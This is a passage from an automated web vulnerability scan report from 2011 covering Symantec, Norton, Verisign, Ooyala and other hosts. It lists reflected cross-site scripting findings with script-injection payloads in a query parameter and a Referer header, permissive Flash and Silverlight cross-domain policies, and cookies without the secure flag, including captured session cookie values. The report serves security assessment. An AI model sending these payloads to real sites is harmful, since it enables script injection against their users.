Path:   /s/searchg/suggest

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 6b734<script>alert(1)</script>b1904ad5262 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /s/searchg/suggest?q=xss6b734<script>alert(1)</script>b1904ad5262&max=10&site=symc_en_US&client=symc_en_US&access=p&format=rich HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622023420-New%7C1336358023420%3B%20event69%3Devent69%7C1336358023421%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Content-Length: 73
Expires: Fri, 09 Sep 2011 21:33:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Sep 2011 21:33:43 GMT
Connection: close
Vary: Accept-Encoding

{ "query":"xss6b734<script>alert(1)</script>b1904ad5262", "results": [] }

3.35. https://cert.webtrust.org/ViewSeal [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://cert.webtrust.org
Path:   /ViewSeal

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 3e394<script>alert(1)</script>ae07fae4fa3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /ViewSeal?id=304 HTTP/1.1
Host: cert.webtrust.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=3e394<script>alert(1)</script>ae07fae4fa3

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 20:14:37 GMT
Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector)
X-Cache: MISS from cert.webtrust.org
Connection: close
Content-Type: text/html
Content-Length: 258

<html>
<head>
<title>Web Trust</title>
<link rel="stylesheet" href="/admin.css" type="text/css">
</head>
<body>
Invalid domain [http://www.google.com/search?hl=en&q=3e394<script>alert(1)</script>ae07fae4fa3]: please contact your practitioner.</body>
...[SNIP]...

4. Flash cross-domain policy
There are 18 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://ak.c.ooyala.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ak.c.ooyala.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ak.c.ooyala.com

Response

HTTP/1.0 200 OK
x-amz-id-2: KN3pSbRmPOnrtBbaZkJNn0JMK9l3niD957+u/ulcUqm9Ba/xmDtCsu4+ok1rK7GJ
x-amz-request-id: 46F7B2194FCF4B8A
Last-Modified: Mon, 12 Jan 2009 21:58:46 GMT
ETag: "124fa42a56284acbe74862f0024af4f3"
Content-Type: text/x-cross-domain-policy
Content-Length: 157
Server: AmazonS3
Cache-Control: max-age=604800
Date: Fri, 09 Sep 2011 21:26:10 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.2. http://cp76677.edgefcs.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cp76677.edgefcs.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: cp76677.edgefcs.net
Proxy-Connection: keep-alive
Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: Keep-Alive
Content-Length: 187
Server: FlashCom/3.5.6
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

4.3. http://mbox3.offermatica.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://mbox3.offermatica.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: mbox3.offermatica.com

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Fri, 09 Sep 2011 21:24:35 GMT
Accept-Ranges: bytes
ETag: W/"201-1315435999000"
Connection: close
Last-Modified: Wed, 07 Sep 2011 22:53:19 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

4.4. http://om.symantec.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://om.symantec.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: om.symantec.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:11 GMT
Server: Omniture DC/2.0.0
xserver: www500
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.5. http://player.ooyala.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://player.ooyala.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: player.ooyala.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 06 Sep 2011 23:02:21 GMT
X-Ooyala-Server-Id: i-2a1c3f45
Content-Type: text/x-cross-domain-policy
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:26:10 GMT
Content-Length: 319
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.6. https://symantec-corporation.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   https://symantec-corporation.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: symantec-corporation.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:34:30 GMT
Server: Apache
Last-Modified: Wed, 19 May 2010 01:45:45 GMT
ETag: "4500fc-148-486e89dcf8440"
Accept-Ranges: bytes
Content-Length: 328
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<!--
Policy file for Responsys, Inc.

Last edit $Date: 2010-05-18 18:42:54
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

4.7. http://symantec.tt.omtrdc.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://symantec.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: symantec.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Fri, 09 Sep 2011 21:30:59 GMT
Accept-Ranges: bytes
ETag: W/"201-1315435999000"
Connection: close
Last-Modified: Wed, 07 Sep 2011 22:53:19 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

4.8. http://ch.norton.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ch.norton.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ch.norton.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Length: 436
Last-Modified: Thu, 07 Oct 2010 22:54:56 GMT
ETag: "1b4-4cae4fc0"
Accept-Ranges: bytes
Content-Type: text/xml;charset=UTF-8
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:41:25 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!--File added for Flash apps-->
<cross-domain-policy>
<allow-access-from domain="*.symantec.com"/>
<allow-access-from domain="*.norton.com"/>
<allow-access-from domain="*.symantecstore.com"/>
<allow-access-from domain="*.nortonopscenter.com"/>
<allow-access-from domain="*.brightcove.com"/>
...[SNIP]...

4.9. http://l.player.ooyala.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://l.player.ooyala.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.1
Host: l.player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Fri, 09 Sep 2011 21:26:09 GMT
Content-Type: text/x-cross-domain-policy
Connection: close
Cache-Control: max-age=3600, private
Content-Length: 330

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*.ooyala.com" />
...[SNIP]...

4.10. http://us.norton.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://us.norton.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: us.norton.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Length: 436
Last-Modified: Thu, 07 Oct 2010 22:54:56 GMT
ETag: "1b4-4cae4fc0"
Accept-Ranges: bytes
Content-Type: text/xml
Cache-Control: public, max-age=2748
Date: Fri, 09 Sep 2011 21:30:57 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!--File added for Flash apps-->
<cross-domain-policy>
<allow-access-from domain="*.symantec.com"/>
<allow-access-from domain="*.norton.com"/>
<allow-access-from domain="*.symantecstore.com"/>
<allow-access-from domain="*.nortonopscenter.com"/>
<allow-access-from domain="*.brightcove.com"/>
...[SNIP]...

4.11. https://us.norton.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://us.norton.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: us.norton.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Length: 436
Last-Modified: Thu, 07 Oct 2010 22:54:56 GMT
ETag: "1b4-4cae4fc0"
Accept-Ranges: bytes
Content-Type: text/xml
Date: Fri, 09 Sep 2011 21:47:32 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!--File added for Flash apps-->
<cross-domain-policy>
<allow-access-from domain="*.symantec.com"/>
<allow-access-from domain="*.norton.com"/>
<allow-access-from domain="*.symantecstore.com"/>
<allow-access-from domain="*.nortonopscenter.com"/>
<allow-access-from domain="*.brightcove.com"/>
...[SNIP]...

4.12. https://www-secure.symantec.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www-secure.symantec.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www-secure.symantec.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Tue, 17 Nov 2009 23:34:35 GMT
ETag: "22a-4b03330b"
Content-Type: text/xml
Date: Fri, 09 Sep 2011 21:47:32 GMT
Content-Length: 554
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!--File added for Flash apps-->
<cross-domain-policy>
<allow-access-from domain="*.symantec.com"/>
<allow-access-from domain="*.norton.com"/>
<allow-access-from domain="*.symantecstore.com"/>
<allow-access-from domain="*.nortonopscenter.com"/>
<allow-access-from domain="*.securityprofessional.com"/>
<allow-access-from domain="*.securitydash.com"/>
<allow-access-from domain="*.brightcove.com"/>
...[SNIP]...

4.13. http://www.symantec.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.symantec.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Tue, 17 Nov 2009 23:34:35 GMT
ETag: "22a-4b03330b"
Content-Type: text/xml
Cache-Control: public, max-age=2498
Date: Fri, 09 Sep 2011 21:26:10 GMT
Content-Length: 554
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!--File added for Flash apps-->
<cross-domain-policy>
<allow-access-from domain="*.symantec.com"/>
<allow-access-from domain="*.norton.com"/>
<allow-access-from domain="*.symantecstore.com"/>
<allow-access-from domain="*.nortonopscenter.com"/>
<allow-access-from domain="*.securityprofessional.com"/>
<allow-access-from domain="*.securitydash.com"/>
<allow-access-from domain="*.brightcove.com"/>
...[SNIP]...

4.14. http://1168.ic-live.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://1168.ic-live.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: 1168.ic-live.com

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
Last-Modified: Thu, 17 Mar 2011 17:54:57 GMT
ETag: "8045c-1c8-49eb15c03de40"
Accept-Ranges: bytes
Content-Length: 456
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="/w3c/p3p.xml"
Content-Type: text/xml
X-Cache: MISS from i2a-coll-20
X-Cache-Lookup: MISS from i2a-coll-20:80
Via: 1.0 i2a-coll-20:80 (squid/2.6.STABLE21)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="ecdev1.avery.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ecdev1.averysignaturebinders.com" secure="false" />
...[SNIP]...
<allow-access-from domain="www.averysignaturebinders.com" secure="false" />
...[SNIP]...

4.15. https://drh.img.digitalriver.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://drh.img.digitalriver.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: drh.img.digitalriver.com

Response

HTTP/1.0 200 OK
ETag: "da-4ae73ece"
Content-Type: text/xml
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=66808035819,0)
Last-Modified: Tue, 27 Oct 2009 18:41:18 GMT
Content-Length: 218
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app72
Accept-Ranges: bytes
Date: Fri, 09 Sep 2011 21:41:50 GMT
Connection: close

<?xml version="1.0"?>
<!-- http://www.adobe.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="gc.digitalriver.com" />
<allow-access-from domain="cx.digitalriver.com" />
</cr
...[SNIP]...

4.16. http://twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:05:29 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 18:09:12 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Fri, 09 Sep 2011 22:35:29 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
   <allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

4.17. http://www.verisign.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.verisign.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:38 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 20:36:58 GMT
Accept-Ranges: bytes
Content-Length: 213
Expires: Sun, 09 Oct 2011 21:24:38 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="cdn.verisign.com"/>
</cross-d
...[SNIP]...

4.18. https://www.verisign.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.verisign.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.verisign.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:45 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 20:36:58 GMT
Accept-Ranges: bytes
Content-Length: 213
Expires: Sun, 09 Oct 2011 21:27:45 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="cdn.verisign.com"/>
</cross-d
...[SNIP]...

5. Silverlight cross-domain policy
There are 2 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://om.symantec.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://om.symantec.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: om.symantec.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:11 GMT
Server: Omniture DC/2.0.0
xserver: www627
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.2. http://player.ooyala.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://player.ooyala.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: player.ooyala.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 03 Aug 2011 01:50:51 GMT
X-Ooyala-Server-Id: i-78a24c19
Content-Type: text/xml
Date: Fri, 09 Sep 2011 21:26:10 GMT
Content-Length: 362
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-methods="*" http-request-headers="*">
<domain uri="*"/>
</allow-fr
...[SNIP]...

6. SSL cookie without secure flag set
There are 67 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


6.1. https://admin.instantservice.com/Customer

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://admin.instantservice.com
Path:   /Customer

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Customer HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:36:51 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=9A45BF0A3BE120A9EF79A1A51006FFFF; Path=/isservices
Location: https://admin.instantservice.com/customerclient_error.html?null
Content-Length: 0
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8


6.2. https://admin.instantservice.com/links/5851/14753

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://admin.instantservice.com
Path:   /links/5851/14753

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/14753 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:49 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
